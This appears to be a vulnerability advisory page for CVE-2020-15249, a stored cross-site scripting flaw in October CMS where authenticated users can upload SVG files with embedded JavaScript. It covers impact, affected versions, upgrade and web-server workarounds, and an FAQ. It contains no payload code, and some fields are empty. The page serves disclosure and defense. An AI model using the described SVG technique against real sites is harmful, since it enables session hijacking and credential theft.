Platform
php
Component
october/backend
Fixed in
1.0.320
1.0.469
CVE-2020-15249 describes a cross-site scripting (XSS) vulnerability within the October CMS backend file upload functionality. This flaw allows authenticated backend users to upload SVG files without proper sanitization, potentially enabling malicious JavaScript execution. The vulnerability impacts versions of October CMS up to and including v1.0.468, and a fix is available in version 1.0.469.
An attacker exploiting this vulnerability could upload a specially crafted SVG file containing malicious JavaScript code. While the backend doesn't display SVGs inline, if a user directly navigates to the uploaded SVG file's URL (e.g., /storage/app/media/evil.svg), the JavaScript would execute within their browser context. This could lead to session hijacking, credential theft, or defacement of the website. The impact is limited by the requirement for the user to directly access the file, preventing automatic exploitation through backend processes. The potential for data exfiltration and user compromise makes this a concerning vulnerability, particularly in environments with sensitive data or privileged user accounts.
This vulnerability was publicly disclosed on November 23, 2020. There is no indication of active exploitation campaigns targeting this specific CVE. No public proof-of-concept (PoC) code has been widely distributed, but the vulnerability's nature makes it relatively straightforward to exploit. It is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.17% (38% percentile)
CVSS Vector
The primary mitigation for CVE-2020-15249 is to upgrade October CMS to version 1.0.469 or later, which includes the necessary sanitization fixes. If upgrading immediately is not feasible, consider implementing a temporary workaround by restricting direct access to the /storage/app/media directory through your web server configuration (e.g., using .htaccess or Nginx rules). Additionally, implement strict input validation and sanitization for all file uploads to prevent similar vulnerabilities in the future. After upgrading, confirm the fix by attempting to upload a test SVG file containing a simple JavaScript alert and verifying that it is properly sanitized and does not execute.
Actualice October CMS a la versión 1.0.469 o superior. Esta versión corrige la vulnerabilidad de XSS almacenado al aplicar sanitización a los archivos SVG subidos. Alternativamente, actualice a la versión 1.1.0.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2020-15249 is a cross-site scripting (XSS) vulnerability in October CMS that allows attackers to upload malicious SVG files.
You are affected if you are using October CMS versions 1.0.468 or earlier. Upgrade to 1.0.469 or later to resolve the issue.
Upgrade October CMS to version 1.0.469 or later. As a temporary workaround, restrict direct access to the /storage/app/media directory.
There is no current evidence of active exploitation, but the vulnerability is relatively easy to exploit.
Refer to the official October CMS security advisory: https://octobercms.com/support/security
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.